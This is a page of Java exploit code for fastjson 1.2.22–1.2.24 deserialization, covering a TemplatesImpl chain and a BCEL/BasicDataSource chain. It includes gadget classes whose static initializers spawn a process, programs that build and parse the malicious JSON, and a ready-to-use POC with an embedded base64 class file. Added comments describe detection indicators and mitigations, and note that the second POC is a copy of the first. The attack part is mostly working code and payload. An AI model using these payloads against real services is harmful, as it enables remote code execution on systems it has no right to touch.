TemplatesImpl利用链
影响版本:fastjson 1.2.22 - 1.2.24
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
/**
 * Gadget class for the TemplatesImpl chain: its static initializer spawns a process
 * ("calc") the moment the JVM loads the class. Both {@code transform} overrides are
 * empty because the class is never used as a real translet; it only needs to be
 * loadable, and it extends {@link AbstractTranslet} presumably because that is the
 * supertype TemplatesImpl expects of the classes it defines from {@code _bytecodes}
 * (TODO confirm against the JDK source).
 *
 * Defender notes: any JSON document whose {@code @type} names
 * {@code com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl} and carries a
 * base64 {@code _bytecodes} array is a strong indicator of this chain; the class
 * load itself can be caught by a deserialization filter or by disallowing the
 * TemplatesImpl type in the parser's type resolution.
 *
 * NOTE(review): the base64 blob in the "POC:" section below was compiled from a
 * class named "Evil" (the blob decodes to strings such as "Evil.java" and "LEvil;"),
 * so it is not byte-for-byte the artifact produced from this "Calc" source.
 */
public class Calc extends AbstractTranslet {
    // Runs once, at class-initialization time (clinit), before any instance exists.
    // This is why merely *loading* the class is enough to trigger the command.
    static {
        try {
            String[] cmd = {"calc"};
            // waitFor() blocks the loading thread until the spawned process exits.
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        } catch ( Exception e ) {
            // Broad catch so an exec failure never escapes the initializer as an
            // ExceptionInInitializerError; the stack trace is printed and ignored.
            e.printStackTrace();
        }
    }

    /** Intentionally empty: never invoked by the chain; satisfies the abstract contract. */
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    /** Intentionally empty: never invoked by the chain; satisfies the abstract contract. */
    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }
}
package sec;
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.util.IOUtils;
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;
/**
 * Builds and parses the fastjson TemplatesImpl payload for the version range named
 * at the top of the page (1.2.22 - 1.2.24).
 *
 * What the visible code does: reads a compiled class file from disk, base64-encodes
 * it, embeds it as the single element of {@code _bytecodes} in a JSON object whose
 * {@code @type} is TemplatesImpl, prints the document, then hands it to
 * {@code JSON.parseObject} with {@code Feature.SupportNonPublicField}.
 *
 * Defender notes:
 * <ul>
 *   <li>{@code Feature.SupportNonPublicField} is passed explicitly; the fields being
 *       set ({@code _bytecodes}, {@code _name}, {@code _tfactory},
 *       {@code _outputProperties}) are underscore-prefixed private fields of
 *       TemplatesImpl, so an application that does not enable this feature appears
 *       not to be reachable through this particular chain (TODO confirm).</li>
 *   <li>The document mixes double-quoted and single-quoted keys. Single quotes are
 *       not valid strict JSON but fastjson accepts them, so inspection tooling that
 *       validates with a strict JSON grammar will not see the same document the
 *       application sees; detectors must use the parser's lenient grammar.</li>
 *   <li>Mitigation is to move off the affected versions and keep autoType resolution
 *       restricted to an explicit allowlist of application types; an {@code @type}
 *       naming a JDK-internal {@code com.sun.*} class should never be honoured.</li>
 * </ul>
 *
 * NOTE(review): {@code _outputProperties} is an empty object; it is presumably
 * present so the parser invokes the matching getter, which is what loads the
 * embedded class (widely documented for this chain, not visible in this file).
 */
public class FastjsonTemplatesImpl {
    public static void main(String[] args) throws IOException {
        // The path literal is a placeholder ("absolute path of the class file").
        byte[] code = Files.readAllBytes(Paths.get("Class文件的绝对路径"));
        String byteCode = Base64.getEncoder().encodeToString(code);
        final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
        // Hand-concatenated JSON; note the inconsistent quoting across lines.
        String payload = "{\"@type\":\"" + NASTY_CLASS +
                "\",\"_bytecodes\":[\""+byteCode+"\"]," +
                "'_name':'Evil'," +
                "'_tfactory':{}," +
                "\"_outputProperties\":{}}\n";
        System.out.println(payload);
        // SupportNonPublicField lets the parser populate private fields; without it
        // the underscore-prefixed TemplatesImpl fields above would not be written.
        Object object = JSON.parseObject(payload, Feature.SupportNonPublicField);
    }
}
POC:
{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADQAPgoACgAoBwApCAAqCgArACwKACsALQoALgAvBwAwCgAHADEHADIHADMBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEABkxFdmlsOwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGRvY3VtZW50AQAtTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007AQAIaGFuZGxlcnMBAEJbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAApFeGNlcHRpb25zBwA0AQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEACGl0ZXJhdG9yAQA1TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQBBTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAAg8Y2xpbml0PgEAA2NtZAEAE1tMamF2YS9sYW5nL1N0cmluZzsBAAFlAQAVTGphdmEvbGFuZy9FeGNlcHRpb247AQANU3RhY2tNYXBUYWJsZQcAMAEAClNvdXJjZUZpbGUBAAlFdmlsLmphdmEMAAsADAEAEGphdmEvbGFuZy9TdHJpbmcBAARjYWxjBwA1DAA2ADcMADgAOQcAOgwAOwA8AQATamF2YS9sYW5nL0V4Y2VwdGlvbgwAPQAMAQAERXZpbAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAEWphdmEvbGFuZy9Qcm9jZXNzAQAHd2FpdEZvcgEAAygpSQEAD3ByaW50U3RhY2tUcmFjZQAhAAkACgAAAAAABAABAAsADAABAA0AAAAvAAEAAQAAAAUqtwABsQAAAAIADgAAAAYAAQAAAAcADwAAAAwAAQAAAAUAEAARAAAAAQASABMAAgANAAAAPwAAAAMAAAABsQAAAAIADgAAAAYAAQAAABcADwAAACAAAwAAAAEAEAARAAAAAAABABQAFQABAAAAAQAWABcAAgAYAAAABAABABkAAQASABoAAgANAAAASQAAAAQAAAABsQAAAAIADgAAAAYAAQAAABwADwAAACoABAAAAAEAEAARAAAAAAABABQAFQA
BAAAAAQAbABwAAgAAAAEAHQAeAAMAGAAAAAQAAQAZAAgAHwAMAAEADQAAAHsABAABAAAAHgS9AAJZAxIDU0u4AAQqtgAFtgAGV6cACEsqtgAIsQABAAAAFQAYAAcAAwAOAAAAGgAGAAAADAAKAA0AFQAQABgADgAZAA8AHQARAA8AAAAWAAIACgALACAAIQAAABkABAAiACMAAAAkAAAABwACWAcAJQQAAQAmAAAAAgAn"],'_name':'Evil','_tfactory':{},"_outputProperties":{}}
BCEL字节码利用
需要依赖:
<dependency>
<groupId>org.apache.tomcat</groupId>
<artifactId>tomcat-dbcp</artifactId>
<version>9.0.8</version>
</dependency>
import java.io.IOException;
/**
 * Gadget class for the BCEL chain: a plain class whose static initializer runs a
 * command ("calc") when the class is loaded. Unlike the TemplatesImpl variant above
 * it has no supertype requirement, because here the loader is BCEL's
 * {@code ClassLoader}, which defines whatever bytecode is encoded in the
 * {@code $$BCEL$$} class name (see the payload builder below).
 *
 * Defender note: the observable behaviour is a child process spawned from a
 * class-initialization frame of an arbitrary, non-application class; process-tree
 * monitoring keyed on the JVM's parent PID catches this regardless of the chain used.
 */
public class Calc {
    // Executed once, on class load (clinit); no instance is ever created.
    static {
        try {
            // Single-string form of exec; the command is tokenized by the runtime.
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            // Failure to spawn is printed and swallowed so class init still succeeds.
            e.printStackTrace();
        }
    }
}
package sec;
import com.alibaba.fastjson.JSON;
import com.sun.org.apache.bcel.internal.classfile.Utility;
import java.nio.file.Files;
import java.nio.file.Paths;
/**
 * Builds and parses the fastjson BCEL payload. Requires tomcat-dbcp on the classpath
 * (the dependency block above) so that {@code org.apache.tomcat.dbcp.dbcp2.BasicDataSource}
 * is resolvable.
 *
 * What the visible code does: reads a compiled class file, encodes it with BCEL's
 * {@code Utility.encode} (second argument {@code true} requests compression), and
 * places the result after the {@code $$BCEL$$} marker in {@code driverClassName},
 * with {@code driverClassLoader} set to BCEL's internal {@code ClassLoader}. The
 * whole object is used as a JSON <em>key</em> (the outer {@code {...}: "bbb"}
 * shape), and the document is parsed with {@code JSON.parse}.
 *
 * Defender notes:
 * <ul>
 *   <li>{@code $$BCEL$$} inside any string value, and an {@code @type} of
 *       {@code com.sun.org.apache.bcel.internal.util.ClassLoader}, are high-confidence
 *       indicators; neither has a legitimate reason to appear in application JSON.</li>
 *   <li>An object used as a map key is not valid strict JSON; as with the single-quoted
 *       keys in the TemplatesImpl payload, detection has to parse the way fastjson does.
 *       NOTE(review): presumably the key is parsed (and the setters invoked) before the
 *       value is examined, which is why the payload sits on the key side — confirm
 *       against the parser source.</li>
 *   <li>No {@code Feature.SupportNonPublicField} is passed here, so this chain appears
 *       to rely on public setters of BasicDataSource rather than private fields
 *       (TODO confirm).</li>
 * </ul>
 *
 * NOTE(review): the "POC:" text that follows this class reproduces the TemplatesImpl
 * document from the first section, not the BasicDataSource/BCEL document this program
 * prints; this looks like a copy error on the page.
 *
 * Style: the class name is not UpperCamelCase and the class is package-private;
 * harmless for a throwaway program but out of step with the companion class above.
 */
class fastjsonbecl {
    public static void main(String[] argv) throws Exception{
        // The path literal is a placeholder ("absolute path of the class file").
        byte[] bytes = Files.readAllBytes(Paths.get("Class文件的绝对路径"));
        // BCEL's own encoding of the class bytes; 'true' = compress before encoding.
        String code = Utility.encode(bytes,true);
        // The outer key is itself a JSON object carrying the BasicDataSource.
        String poc = "{\n" +
                " {\n" +
                " \"aaa\": {\n" +
                " \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n" +
                " \"driverClassLoader\": {\n" +
                " \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +
                " },\n" +
                " \"driverClassName\": \"$$BCEL$$"+ code+ "\"\n" +
                " }\n" +
                " }: \"bbb\"\n" +
                "}";
        System.out.println(poc);
        // Plain parse, no extra features requested.
        JSON.parse(poc);
    }
}
POC:
{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["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"],'_name':'Evil','_tfactory':{},"_outputProperties":{}}